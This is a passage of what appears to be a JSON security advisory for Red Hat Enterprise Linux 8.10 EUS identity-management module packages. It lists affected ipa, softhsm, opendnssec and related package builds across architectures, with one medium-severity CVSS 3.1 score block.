"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
